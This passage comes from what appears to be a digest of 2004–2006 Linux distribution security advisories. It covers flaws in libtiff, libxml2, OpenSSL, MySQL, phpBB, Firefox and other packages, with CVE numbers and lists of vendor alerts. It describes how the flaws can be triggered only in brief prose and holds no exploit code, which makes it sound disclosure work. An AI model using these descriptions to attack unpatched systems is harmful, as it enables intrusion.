Description: A heap based buffer overflow bug was found in the way libpng strips alpha channels from a PNG image. An attacker could create a carefully crafted PNG image file in such a way that it could cause an application linked with libpng to crash or execute arbitrary code when the file is opened by a victim.
Alerts:
Gentoo 200812-15 povray 2008-12-14
Red Hat RHSA-2006:0205-01 libpng 2006-02-13

Comments (1 posted)

libtiff: buffer overflow

Package(s):libtiff CVE #(s):CVE-2006-2193
Created:June 15, 2006 Updated:September 1, 2008
Description: The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters in the DocumentName tag to overflow a buffer, causing a denial of service, and possibly the execution of arbitrary code.
Alerts:
CentOS CESA-2008:0848 libtiff 2008-08-30
Red Hat RHSA-2008:0848-01 libtiff 2008-08-28
Fedora FEDORA-2006-952 libtiff 2006-09-05
SuSE SUSE-SA:2006:044 libtiff 2006-08-01
Gentoo 200607-03 tiff 2006-07-09
SuSE SUSE-SR:2006:014 tiff, snort, xine-lib 2006-06-20
Trustix TSLSA-2006-0036 fcron, libtiff 2006-06-16
Mandriva MDKSA-2006:102 libtiff 2006-06-14

Comments (none posted)

libvncserver: authentication bypass

Package(s):libvncserver CVE #(s):CVE-2006-2450
Created:August 4, 2006 Updated:March 19, 2007
Description: LibVNCServer fails to properly validate protocol types effectively letting users decide what protocol to use, such as "Type 1 - None". LibVNCServer will accept this security type, even if it is not offered by the server.
Alerts:
Gentoo 200703-19 ltsp 2007-03-18
Gentoo 200608-12 x11vnc 2006-08-07
Gentoo 200608-05 libvncserver 2006-08-04

Comments (none posted)

libwmf: integer overflow

Package(s):libwmf CVE #(s):CVE-2006-3376
Created:July 13, 2006 Updated:November 6, 2006
Description: libwmf, a library that is used for processing Windows MetaFile vector graphics files, has an integer overflow vulnerability.
Alerts:
OpenPKG OpenPKG-SA-2006.031 libwmf 2006-11-06
Debian DSA-1194-1 libwmf 2006-10-09
Gentoo 200608-17 libwmf 2006-08-10
Ubuntu USN-333-1 libwmf 2006-08-09
Mandriva MDKSA-2006:132 libwmf 2006-07-28
Fedora FEDORA-2006-831 libwmf 2006-07-18
Fedora FEDORA-2006-832 libwmf 2006-07-18
Fedora FEDORA-2006-805 libwmf 2006-07-12
Fedora FEDORA-2006-804 libwmf 2006-07-12

Comments (none posted)

libxml2 - arbitrary code execution

Package(s):libxml2 CVE #(s):CAN-2004-0110
Created:February 26, 2004 Updated:August 19, 2009
Description: Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code.
Alerts:
Fedora FEDORA-2009-8594 libxml 2009-08-15
Fedora FEDORA-2009-8582 libxml 2009-08-15
Fedora-Legacy FLSA:1324 libxml2 2004-07-19
Conectiva CLA-2004:836 libxml2 2004-03-31
Gentoo 200403-01 libxml2 2004-03-06
Trustix TSLSA-2004-0010 libxml2 2004-03-05
OpenPKG OpenPKG-SA-2004.003 libxml 2004-03-05
Netwosix NW-2004-0004 libxml2 2004-03-04
Debian DSA-455-1 libxml 2004-03-03
Mandrake MDKSA-2004:018 libxml2 2004-03-03
Red Hat RHSA-2004:091-02 libxml2 2004-03-03
Whitebox WBSA-2004:090-01 libxml2 2004-03-01
Red Hat RHSA-2004:090-01 Cross 2004-02-26
Fedora FEDORA-2004-087 libxml2 2004-02-25
Red Hat RHSA-2004:091-01 libxml2 2004-02-26

Comments (none posted)

libxml2: multiple buffer overflows

Package(s):libxml2 CVE #(s):CAN-2004-0989
Created:October 28, 2004 Updated:August 19, 2009
Description: libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities, if a local user passes a specially crafted FTP URL, arbitrary code may be executed.
Alerts:
Fedora FEDORA-2009-8594 libxml 2009-08-15
Fedora FEDORA-2009-8582 libxml 2009-08-15
Ubuntu USN-89-1 libxml 2005-02-28
Red Hat RHSA-2004:650-01 libxml 2004-12-16
Conectiva CLA-2004:890 libxml2 2004-11-18
Red Hat RHSA-2004:615-01 libxml2 2004-11-12
Mandrake MDKSA-2004:127 libxml/libxml2 2004-11-04
Debian DSA-582-1 libxml 2004-11-02
Gentoo 200411-05 libxml2 2004-11-02
Trustix TSLSA-2004-0055 libxml2, 2004-10-29
OpenPKG OpenPKG-SA-2004.050 libxml 2004-10-31
Ubuntu USN-10-1 libxml 2004-10-28
Fedora FEDORA-2004-353 libxml2 2004-10-28

Comments (none posted)

lynx: arbitrary command execution

Package(s):lynx CVE #(s):CVE-2005-2929
Created:November 14, 2005 Updated:September 14, 2009
Description: An arbitrary command execute bug was found in the lynx "lynxcgi:" URI handler. An attacker could create a web page redirecting to a malicious URL which could execute arbitrary code as the user running lynx.
Alerts:
Gentoo 200909-15 lynx 2009-09-12
Fedora-Legacy FLSA:152832 lynx 2005-12-17
OpenPKG OpenPKG-SA-2005.026 lynx 2005-12-03
Fedora FEDORA-2005-1079 lynx 2005-11-14
Fedora FEDORA-2005-1078 lynx 2005-11-14
Gentoo 200511-09 lynx 2005-11-13
Mandriva MDKSA-2005:211 lynx 2005-11-12
Red Hat RHSA-2005:839-01 lynx 2005-11-11

Comments (none posted)

mailman: several vulnerabilities

Package(s):mailman CVE #(s):CVE-2006-2941 CVE-2006-3636
Created:September 8, 2006 Updated:October 23, 2006
Description: A flaw was found in the way Mailman handled MIME multipart messages. An attacker could send a carefully crafted MIME multipart email message to a mailing list run by Mailman which caused that particular mailing list to stop working. (CVE-2006-2941)

Several cross-site scripting (XSS) issues were found in Mailman. An attacker could exploit these issues to perform cross-site scripting attacks against the Mailman administrator. (CVE-2006-3636)

Alerts:
Fedora FEDORA-2006-1013 mailman 2006-10-23
Debian DSA-1188-1 mailman 2006-10-04
Gentoo 200609-12 mailman 2006-09-19
Mandriva MDKSA-2006:165 mailman 2006-09-18
Ubuntu USN-345-1 mailman 2006-09-13
rPath rPSA-2006-0165-1 mailman 2006-09-08
Red Hat RHSA-2006:0600-01 mailman 2006-09-06

Comments (none posted)

migrationtools: insecure temporary files

Package(s):migrationtools CVE #(s):CVE-2006-0512
Created:October 2, 2006 Updated:October 4, 2006
Description: Jason Hoover discovered that migrationtools, a collection of scripts to migrate user data to LDAP creates several temporary files insecurely, which might lead to denial of service through a symlink attack.
Alerts:
Debian DSA-1187-1 migrationtools 2006-09-30

Comments (none posted)

mono: symlink vulnerability

Package(s):mono CVE #(s):CVE-2006-5072
Created:October 4, 2006 Updated:December 1, 2006
Description: The mono System.CodeDom.Compiler classes suffer from a temporary file symlink vulnerability which could be used to overwrite files, or, in this case, even inject arbitrary code into a running mono application.
Alerts:
SuSE SUSE-SA:2006:073 mono-core 2006-12-01
Gentoo 200611-23 mono 2006-11-28
Mandriva MDKSA-2006:188 mono 2006-10-27
Fedora FEDORA-2006-1012 mono 2006-10-06
Ubuntu USN-357-1 mono 2006-10-04

Comments (none posted)

firefox: multiple vulnerabilities

Package(s):mozilla firefox thunderbird CVE #(s):CVE-2006-4565 CVE-2006-4566 CVE-2006-4571 CVE-2006-4253 CVE-2006-4567 CVE-2006-4568 CVE-2006-4569
Created:September 15, 2006 Updated:November 14, 2006
Description: Two flaws were found in the way Firefox/Thunderbird processed certain regular expressions. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4565, CVE-2006-4566)

A number of flaws were found in Firefox/Thunderbird. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4571)

A flaw was found in the handling of JavaScript timed events. A malicious web page could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4253)

A flaw was found in the Firefox/Thunderbird auto-update verification system. An attacker who has the ability to spoof a victim's DNS could get Firefox to download and install malicious code. In order to exploit this issue an attacker would also need to get a victim to previously accept an unverifiable certificate. (CVE-2006-4567)

Firefox did not properly prevent a frame in one domain from injecting content into a sub-frame that belongs to another domain, which facilitates website spoofing and other attacks (CVE-2006-4568)

Firefox did not load manually opened, blocked popups in the right domain context, which could lead to cross-site scripting attacks. In order to exploit this issue an attacker would need to find a site which would frame their malicious page and convince the user to manually open a blocked popup. (CVE-2006-4569)

Alerts:
Debian DSA-1210-1 mozilla-firefox 2006-11-14
Gentoo 200610-04 seamonkey 2006-10-16
Ubuntu USN-361-1 mozilla 2006-10-10
Debian DSA-1192-1 mozilla 2006-10-06
Gentoo 200610-01 thunderbird 2006-10-04
Debian DSA-1191-1 mozilla-thunderbird 2006-10-05
Ubuntu USN-354-1 firefox 2006-10-02
Gentoo 200609-19 firefox 2006-09-28
Mandriva MDKSA-2006:169 mozilla-thunderbird 2006-09-22
Ubuntu USN-352-1 mozilla-thunderbird 2006-09-25
Ubuntu USN-351-1 firefox 2006-09-22
SuSE SUSE-SA:2006:054 MozillaFirefox,MozillaThunderbird,seamonkey 2006-09-22
Ubuntu USN-350-1 mozilla-thunderbird 2006-09-21
Mandriva MDKSA-2006:168 mozilla-firefox 2006-09-20
Red Hat RHSA-2006:0677-01 thunderbird 2006-09-15
Red Hat RHSA-2006:0676-01 seamonkey 2006-09-15
Red Hat RHSA-2006:0675-01 firefox 2006-09-15
rPath rPSA-2006-0169-1 firefox 2006-09-15
Slackware SSA:2006-257-03 mozilla 2006-09-15
Fedora FEDORA-2006-977 thunderbird 2006-09-14
Fedora FEDORA-2006-976 firefox 2006-09-14

Comments (none posted)

mutt: IMAP namespace buffer overflow

Package(s):mutt CVE #(s):CVE-2006-3242
Created:June 28, 2006 Updated:October 24, 2006
Description: TAKAHASHI Tamotsu discovered that mutt's IMAP backend did not sufficiently check the validity of namespace strings. If an user connects to a malicious IMAP server, that server could exploit this to crash mutt or even execute arbitrary code with the privileges of the mutt user. See this Secunia advisory for more information.
Alerts:
Fedora FEDORA-2006-1061 mutt 2006-10-24
Slackware SSA:2006-207-01 mutt 2006-07-27
OpenPKG OpenPKG-SA-2006.013 mutt 2006-07-15
SuSE SUSE-SR:2006:016 acroread, libpng, wget, mutt, horde 2006-07-14
Red Hat RHSA-2006:0577-01 mutt 2006-07-12
Debian DSA-1108-1 mutt 2006-07-11
Fedora FEDORA-2006-761 mutt 2006-06-29
Fedora FEDORA-2006-760 mutt 2006-06-29
Trustix TSLSA-2006-0038 gd, mutt 2006-06-30
rPath rPSA-2006-0116-1 mutt 2006-06-29
Mandriva MDKSA-2006:115 mutt 2006-06-28
Gentoo 200606-27 mutt 2006-06-28
Ubuntu USN-307-1 mutt 2006-06-28

Comments (none posted)

mysql: format string bug

Package(s):mysql CVE #(s):CVE-2006-3469
Created:July 21, 2006 Updated:July 30, 2008
Description: Jean-David Maillefer discovered a format string bug in the date_format() function's error reporting. By calling the function with invalid arguments, an authenticated user could exploit this to crash the server.
Alerts:
Red Hat RHSA-2008:0768-01 mysql 2008-07-24
Slackware SSA:2006-211-01 mysql 2006-07-31
Ubuntu USN-321-1 mysql-dfsg-4.1 2006-07-21

Comments (none posted)

MySQL: privilege violations

Package(s):mysql CVE #(s):CVE-2006-4031 CVE-2006-4226
Created:August 25, 2006 Updated:July 30, 2008
Description: MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy (CVE-2006-4031).

MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions (CVE-2006-4226).

Alerts:
Red Hat RHSA-2008:0768-01 mysql 2008-07-24
Red Hat RHSA-2008:0364-01 mysql 2008-05-21
Red Hat RHSA-2007:0152-01 mysql 2007-04-03
Red Hat RHSA-2007:0083-01 MySQL 2007-02-19
Fedora FEDORA-2006-1298 mysql 2006-11-27
Fedora FEDORA-2006-1297 mysql 2006-11-27
Ubuntu USN-338-1 mysql-dfsg-5.0 2006-09-05
Mandriva MDKSA-2006:149 MySQL 2006-08-24

Comments (none posted)

MySQL: logging bypass

Package(s):mysql CVE #(s):CVE-2006-0903
Created:April 4, 2006 Updated:May 21, 2008
Description: MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
Alerts:
Red Hat RHSA-2008:0364-01 mysql 2008-05-21
Ubuntu USN-274-2 mysql-dfsg 2006-05-15
Ubuntu USN-274-1 mysql-dfsg 2006-04-27
Mandriva MDKSA-2006:064 MySQL 2006-04-03

Comments (2 posted)

nbd: arbitrary code execution

Package(s):nbd CVE #(s):CVE-2005-3534
Created:January 6, 2006 Updated:March 7, 2011
Description: Kurt Fitzner discovered that the NBD (network block device) server did not correctly verify the maximum size of request packets. By sending specially crafted large request packets, a remote attacker who is allowed to access the server could exploit this to execute arbitrary code with root privileges.
Alerts:
SuSE SUSE-SR:2006:001 multi 2006-01-13
Ubuntu USN-237-1 nbd 2006-01-06

Comments (none posted)

ncompress: buffer underflow

Package(s):ncompress CVE #(s):CVE-2006-1168
Created:August 10, 2006 Updated:February 21, 2012
Description: The ncompress compression utility has a missing boundary check. A local user can use a maliciously created file to cause a a .bss buffer underflow.
Alerts:
Gentoo 200610-03 ncompress 2006-10-06
Red Hat RHSA-2006:0663-01 ncompress 2006-09-12
Mandriva MDKSA-2006:140 ncompress 2006-08-09
Debian DSA-1149-1 ncompress 2006-08-10
Red Hat RHSA-2012:0308-03 busybox 2012-02-21
Scientific Linux SL-busy-20120321 busybox 2012-03-21
Red Hat RHSA-2012:0810-04 busybox 2012-06-20
Scientific Linux SL-busy-20120709 busybox 2012-07-09
Mageia MGASA-2012-0171 busybox 2012-07-19
Mandriva MDVSA-2012:129 busybox 2012-08-10
Mandriva MDVSA-2012:129-1 busybox 2012-08-10
Gentoo 201312-02 busybox 2013-12-02

Comments (none posted)

nss: signature forgery vulnerability

Package(s):nss CVE #(s):CVE-2006-4340
Created:September 15, 2006 Updated:October 18, 2006
Description: Daniel Bleichenbacher recently described an implementation error in RSA signature verification. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that which would be incorrectly verified by the NSS library.
Alerts:
Gentoo 200610-06 nss 2006-10-17
SuSE SUSE-SA:2006:055 openssl,mozilla-nss 2006-09-22
Fedora FEDORA-2006-979 nss 2006-09-14

Comments (1 posted)

openldap: security bypass

Package(s):openldap CVE #(s):CVE-2006-4600
Created:September 29, 2006 Updated:June 12, 2007
Description: slapd in OpenLDAP before 2.3.25 allows remote authenticated users with selfwrite Access Control List (ACL) privileges to modify arbitrary Distinguished Names (DN).
Alerts:
Red Hat RHSA-2007:0430-01 openldap 2007-06-11
Red Hat RHSA-2007:0310-02 openldap 2007-05-01
Trustix TSLSA-2006-0055 openldap, php, php4 2006-10-06
rPath rPSA-2006-0176-1 openldap 2006-09-29
Mandriva MDKSA-2006:171 openldap 2006-09-28

Comments (none posted)

openoffice.org: several vulnerabilities

Package(s):openoffice.org CVE #(s):CVE-2006-2198 CVE-2006-2199 CVE-2006-3117
Created:June 30, 2006 Updated:January 4, 2007
Description: Several vulnerabilities have been discovered in OpenOffice.org, a free office suite.
  • It turned out to be possible to embed arbitrary BASIC macros in documents in a way that OpenOffice.org does not see them but executes them anyway without any user interaction. (CVE-2006-2198)
  • It is possible to evade the Java sandbox with specially crafted Java applets. (CVE-2006-2199)
  • Loading malformed XML documents can cause buffer overflows and cause a denial of service or execute arbitrary code. (CVE-2006-3117)
Alerts:
Fedora FEDORA-2007-005 openoffice.org 2007-01-03
rPath rPSA-2006-0173-1 openoffice.org 2006-09-26
Gentoo 200607-12 openoffice 2006-07-28
Ubuntu USN-313-2 openoffice.org2-amd64, openoffice.org2 2006-07-19
Ubuntu USN-313-1 openoffice.org 2006-07-11
Mandriva MDKSA-2006:118 OpenOffice.org 2006-07-07
Debian DSA-1104-2 openoffice.org 2006-07-06
Red Hat RHSA-2006:0573-01 openoffice.org 2006-07-03
SuSE SUSE-SA:2006:040 OpenOffice_org 2006-07-03
Fedora FEDORA-2006-770 openoffice.org 2006-07-03
Fedora FEDORA-2006-764 openoffice.org 2006-06-30
Debian DSA-1104-1 openoffice.org 2006-06-30

Comments (none posted)

openssh: remote denial of service

Package(s):openssh CVE #(s):CVE-2006-4924 CVE-2006-5051
Created:September 27, 2006 Updated:September 17, 2008
Description: Openssh 4.4 fixes some security issues, including a pre-authentication denial of service, an unsafe signal hander and on portable OpenSSH a GSSAPI authentication abort could be used to determine the validity of usernames on some platforms.
Alerts:
Debian DSA-1638-1 openssh 2008-09-16
Debian DSA-1212-1 openssh 2006-11-15
Fedora FEDORA-2006-1011 openssh 2006-10-03
Debian DSA-1189-1 openssh-krb5 2006-10-04
Mandriva MDKSA-2006:179 openssh 2006-10-03
Ubuntu USN-355-1 openssh 2006-10-02
OpenPKG OpenPKG-SA-2006.022 openssh 2006-10-01
Slackware SSA:2006-272-02 openssh 2006-09-29
Red Hat RHSA-2006:0698-01 openssh 2006-09-28
Red Hat RHSA-2006:0697-01 openssh 2006-09-28
Gentoo 200609-17:02 openssh 2006-09-27
rPath rPSA-2006-0174-1 openssh 2006-09-27
Gentoo 200609-17 openssh 2006-09-27

Comments (none posted)

openssl: insufficient signature checking

Package(s):openssl CVE #(s):CVE-2006-4339
Created:September 5, 2006 Updated:November 15, 2006
Description: Philip Mackenzie, Marius Schilder, Jason Waddle and Ben Laurie of Google Security discovered that the OpenSSL library did not sufficiently check the padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3 (which is widely used for CAs). This could be exploited to forge signatures without the need of the secret key.
Alerts:
Mandriva MDKSA-2006:207 bind 2006-11-14
Slackware SSA:2006-310-01 bind 2006-11-07
OpenPKG OpenPKG-SA-2006.029 bind 2006-11-06
SuSE SUSE-SA:2006:061 opera 2006-10-19
Slackware SSA:2006-257-02 openssl 2006-09-15
Gentoo 200609-05:02 openssl 2006-09-07
Debian DSA-1174-1 openssl096 2006-09-11
Debian DSA-1173-1 openssl 2006-09-10
Red Hat RHSA-2006:0661-01 OpenSSL 2006-09-06
Gentoo 200609-05 openssl 2006-09-07
Mandriva MDKSA-2006:161 openssl 2006-09-06
rPath rPSA-2006-0163-1 openssl 2006-09-05
OpenPKG OpenPKG-SA-2006.018 openssl 2006-09-06
Fedora FEDORA-2006-953 openssl 2006-09-05
Ubuntu USN-339-1 openssl 2006-09-05
Gentoo 201408-19 openoffice-bin 2014-08-31

Comments (none posted)

openssl: multiple vulnerabilities

Package(s):openssl CVE #(s):CVE-2006-2937 CVE-2006-2940 CVE-2006-3780 CVE-2006-4343 CVE-2006-3738
Created:September 28, 2006 Updated:December 12, 2006
Description: OpenSSL has a number of denial of service vulnerabilities including: two vulnerabilities involving invalid ASN.1 structures, a buffer overflow in the SSL_get_shared_ciphers() function and an SSLv2 client crash that can be caused by a malicious server.
Alerts:
Gentoo 200612-11 emul-linux-x86-baselibs 2006-12-11
Gentoo 200610-11 openssl 2006-10-24
Debian DSA-1195-1 openssl096 2006-10-10
SuSE SUSE-SR:2006:024 openssh, openssl, bind9 2006-10-06
Ubuntu USN-353-2 openssl 2006-10-04
Mandriva MDKSA-2006:178 ntp 2006-10-02
Mandriva MDKSA-2006:177 MySQL 2006-10-02
Mandriva MDKSA-2006:172-1 openssl 2006-10-02
Debian DSA-1185-2 openssl 2006-10-02
rPath rPSA-2006-0175-2 openssl 2006-09-28
Fedora FEDORA-2006-1004 openssl 2006-09-28
Trustix TSLSA-2006-0054 openssh, openssl 2006-09-29
Slackware SSA:2006-272-01 openssl 2006-09-29
rPath rPSA-2006-0175-1 openssl 2006-09-28
Red Hat RHSA-2006:0695-01 OpenSSL 2006-09-28
Mandriva MDKSA-2006:172 openssl 2006-09-28
Debian DSA-1185-1 openssl 2006-09-28
Ubuntu USN-353-1 openssl 2006-09-28
SuSE SUSE-SA:2006:058 openssl 2006-09-28
OpenPKG OpenPKG-SA-2006.021 openssl 2006-09-28

Comments (none posted)

opera: RSA signature forgery

Package(s):opera CVE #(s):
Created:September 28, 2006 Updated:October 4, 2006
Description: The Opera browser has a problem verifying OpenSSL PKCS #1 v1.5 RSA signatures. An attacker can use this to forge certificates and appear as a valid CA.
Alerts:
Gentoo 200609-18 opera 2006-09-28

Comments (none posted)

php: several vulnerabilities

Package(s):php CVE #(s):CVE-2006-4481 CVE-2006-4484 CVE-2006-4485
Created:September 8, 2006 Updated:June 13, 2008
Description: The file_exists and imap_reopen functions in PHP before 5.1.5 do not check for the safe_mode and open_basedir settings, which allows local users to bypass the settings (CVE-2006-4481).

A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c in the GD extension in PHP before 5.1.5 allows remote attackers to have an unknown impact via a GIF file with input_code_size greater than MAX_LWZ_BITS, which triggers an overflow when initializing the table array (CVE-2006-4484).

The stripos function in PHP before 5.1.5 has unknown impact and attack vectors related to an out-of-bounds read (CVE-2006-4485).

Alerts:
SuSE SUSE-SR:2008:013 thunderbird, xulrunner, tkimg, cups, qemu, gstreamer010-plugins-good, pan, libxslt 2008-06-13
Mandriva MDVSA-2008:077 perl-Tk 2007-03-26
SuSE SUSE-SR:2008:005 acroread, asterisk, cacti, compat-openssl097g, icu, libcdio, wireshark/ethereal, Jakarta, perl-tk 2008-03-06
Red Hat RHSA-2008:0146-01 gd 2008-02-28
Fedora FEDORA-2008-1643 graphviz 2008-02-13
Foresight FLEA-2008-0007-1 gd 2008-02-11
Fedora FEDORA-2008-1122 tk 2008-02-05
Fedora FEDORA-2008-1131 tk 2008-02-05
SuSE SUSE-SR:2008:003 java, nss_ldap, cairo, geronimo, moodle, SDL_image, python, mysql, nx, xemacs 2008-02-07
Mandriva MDVSA-2008:038 gd 2007-02-07
rPath rPSA-2008-0046-1 gd 2008-02-06
Gentoo 200802-01 sdl-image 2008-02-06
rPath rPSA-2006-0182-1 php 2006-10-05
SuSE SUSE-SA:2006:052 php4,php5 2006-09-21
Red Hat RHSA-2006:0669-01 PHP 2006-09-21
Mandriva MDKSA-2006:162 php 2006-09-07

Comments (1 posted)

phpbb2: missing input sanitizing

Package(s):phpbb2 CVE #(s):CVE-2006-1896
Created:May 22, 2006 Updated:February 11, 2008
Description: It was discovered that phpbb2, a web based bulletin board, insufficiently sanitizes values passed to the "Font Color 3" setting, which might lead to the execution of injected code by admin users.
Alerts:
Debian DSA-1066-1 phpbb2 2006-05-20

Comments (none posted)

phpbb2: multiple vulnerabilities

Package(s):phpbb2 CVE #(s):CVE-2005-3310 CVE-2005-3415 CVE-2005-3416 CVE-2005-3417 CVE-2005-3418 CVE-2005-3419 CVE-2005-3420 CVE-2005-3536 CVE-2005-3537
Created:December 22, 2005 Updated:February 11, 2008
Description: The phpbb2 web forum has a number of vulnerabilities including: a web script injection problem, a protection mechanism bypass, a security check bypass, a remote global variable bypass, cross site scripting vulnerabilities, an SQL injection vulnerability, a remote regular expression modification problem, missing input sanitizing, and a missing request validation problem.
Alerts:
Debian DSA-925-1 phpbb2 2005-12-22

Comments (none posted)

phpMyAdmin: multiple vulnerabilities

Package(s):phpmyadmin CVE #(s):CVE-2005-4079 CVE-2005-3665
Created:December 12, 2005 Updated:November 20, 2006
Description: Stefan Esser reported multiple vulnerabilities found in phpMyAdmin. The $GLOBALS variable allows modifying the global variable import_blacklist to open phpMyAdmin to local and remote file inclusion, depending on your PHP version (CVE-2005-4079, PMASA-2005-9). Furthermore, it is also possible to conduct an XSS attack via the $HTTP_HOST variable and a local and remote file inclusion because the contents of the variable are under total control of the attacker (CVE-2005-3665, PMASA-2005-8).
Alerts:
Debian DSA-1207-2 phpmyadmin 2006-11-19
Debian DSA-1207-1 phpmyadmin 2006-11-09
SuSE SUSE-SA:2006:004 phpMyAdmin 2006-01-26
Gentoo 200512-03 phpmyadmin 2005-12-11

Comments (none posted)

postgresql: SQL injection

Package(s):postgresql CVE #(s):CVE-2006-2313 CVE-2006-2314
Created:May 24, 2006 Updated:June 6, 2007
Description: The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a newly-discovered set of SQL injection issues. Details about the problem can be found on the technical information page; in short: multi-byte encodings can be used to defeat normal string sanitizing techniques. The update fixes one problem related to invalid multi-byte characters, but punts on another by simply disallowing the old, unsafe technique of escaping single quotes with a backslash.
Alerts:
Fedora FEDORA-2007-0249 php-pear-DB 2007-06-06
Trustix TSLSA-2006-0059 postgresql 2006-10-27
Gentoo 200607-04 postgresql 2006-07-09
SuSE SUSE-SA:2006:030 postgresql 2006-06-09
Ubuntu USN-288-3 dovecot, exim4, postfix 2006-06-09
Ubuntu USN-288-2 postgresql-8.1 2006-06-09
Mandriva MDKSA-2006:098 postgresql 2006-06-07
Debian DSA-1087-1 postgresql 2006-06-03
Ubuntu USN-288-1 postgresql 2006-05-29
rPath rPSA-2006-0080-1 postgresql 2006-05-24
Red Hat RHSA-2006:0526-02 postgresql 2006-05-23
Fedora FEDORA-2006-578 postgresql 2006-05-23
Fedora FEDORA-2006-579 postgresql 2006-05-23

Comments (1 posted)

quake: buffer overflow

Package(s):quake3-bin CVE #(s):CVE-2006-2236
Created:May 10, 2006 Updated:January 12, 2009
Description: Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server.
Alerts:
Gentoo 200901-06 tremulous 2009-01-11
Gentoo 200605-12 quake3-bin 2006-05-10

Comments (none posted)

sendmail: denial of service

Package(s):sendmail CVE #(s):CVE-2006-1173
Created:June 15, 2006 Updated:November 1, 2006
Description: Sendmail has a vulnerability in the way it handles multi-part MIME messages. A remote attacker can create a specially crafted email message that can be used to crash the sendmail process, causing a denial of service.
Alerts:
Fedora-Legacy FLSA:195418 sendmail 2006-10-29
Debian DSA-1155-2 sendmail 2006-08-24
Debian DSA-1155-1 sendmail 2006-08-24
rPath rPSA-2006-0134-1 sendmail 2006-07-21
Fedora FEDORA-2006-837 sendmail 2006-07-18
Fedora FEDORA-2006-836 sendmail 2006-07-18
Gentoo 200606-19 sendmail 2006-06-15
SuSE SUSE-SA:2006:032 sendmail 2006-06-14
Slackware SSA:2006-166-01 sendmail 2006-06-15
Red Hat RHSA-2006:0515-01 sendmail 2006-06-14
Mandriva MDKSA-2006:104 sendmail 2006-06-14

Comments (none posted)

shadow-utils: mailbox creation vulnerability

Package(s):shadow-utils CVE #(s):CVE-2006-1174
Created:May 25, 2006 Updated:June 12, 2007
Description: The useradd tool from the shadow-utils package has a potential security problem. When a new user's mailbox is created, the permissions are set to random garbage from the stack, potentially allowing the file to be read or written during the time before fchmod() is called.
Alerts:
Red Hat RHSA-2007:0431-01 shadow-utils 2007-06-11
rPath rPSA-2007-0096-1 shadow 2007-05-11
Red Hat RHSA-2007:0276-02 shadow-utils 2007-05-01
Gentoo 200606-02 shadow 2006-06-07
Mandriva MDKSA-2006:090 shadow-utils 2006-05-24

Comments (none posted)

texinfo: temporary file vulnerability

Package(s):texinfo CVE #(s):CAN-2005-3011
Created:October 5, 2005 Updated:November 9, 2006
Description: Texinfo prior to version 4.8-r1 suffers from a temporary file vulnerability.
Alerts:
Ubuntu USN-194-2 texinfo 2006-01-09
Fedora FEDORA-2005-991 texinfo 2005-10-14
Fedora FEDORA-2005-990 texinfo 2005-10-14
Mandriva MDKSA-2005:175 texinfo 2005-10-06
Ubuntu USN-194-1 texinfo 2005-10-06
Gentoo 200510-04 texinfo 2005-10-05

Comments (none posted)

tin: buffer overflow

Package(s):tin CVE #(s):CVE-2006-0804
Created:February 19, 2006 Updated:November 24, 2006
Description: An allocation off-by-one bug exists in the TIN news reader version 1.8.0 and earlier which can lead to a buffer overflow.
Alerts:
Gentoo 200611-18 tin 2006-11-24
OpenPKG OpenPKG-SA-2006.005 tin 2006-02-19

Comments (none posted)

unzip: long file name buffer overflow

Package(s):unzip CVE #(s):CVE-2005-4667
Created:February 6, 2006 Updated:May 2, 2007
Description: A buffer overflow in UnZip 5.50 and earlier allows local users to execute arbitrary code via a long filename command line argument. NOTE: since the overflow occurs in a non-setuid program, there are not many scenarios under which it poses a vulnerability, unless unzip is passed long arguments when it is invoked from other programs.
Alerts:
Red Hat RHSA-2007:0203-02 unzip 2007-05-01
Fedora-Legacy FLSA:180159 unzip 2006-04-04
Debian DSA-1012-1 unzip 2006-03-21
Mandriva MDKSA-2006:050 unzip 2006-02-27
Ubuntu USN-248-2 unzip 2006-02-15
Ubuntu USN-248-1 unzip 2006-02-13
Fedora FEDORA-2006-098 unzip 2006-02-06

Comments (1 posted)

w3c-libwww: possible stack overflow

Package(s):w3c-libwww CVE #(s):CVE-2005-3183
Created:October 14, 2005 Updated:May 2, 2007
Description: xtensive testing of libwww's handling of multipart/byteranges content from HTTP/1.1 servers revealed multiple logical flaws and bugs in Library/src/HTBound.c
Alerts:
Red Hat RHSA-2007:0208-02 w3c-libwww 2007-05-01
Ubuntu USN-220-1 w3c-libwww 2005-12-01
Mandriva MDKSA-2005:210 w3c-libwww 2005-11-09
Fedora FEDORA-2005-953 w3c-libwww 2005-10-07
Fedora FEDORA-2005-952 w3c-libwww 2005-10-07

Comments (1 posted)

webmin: cross-site scripting

Package(s):webmin CVE #(s):CVE-2006-4542
Created:September 26, 2006 Updated:October 24, 2006
Description: Webmin before 1.296 and Usermin before 1.226 does not properly handle a URL with a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs.
Alerts:
Debian DSA-1199-1 webmin 2006-10-23
Mandriva MDKSA-2006:170-1 webmin 2006-09-27
Mandriva MDKSA-2006:170 webmin 2006-09-22

Comments (none posted)

wireshark: several vulnerabilities

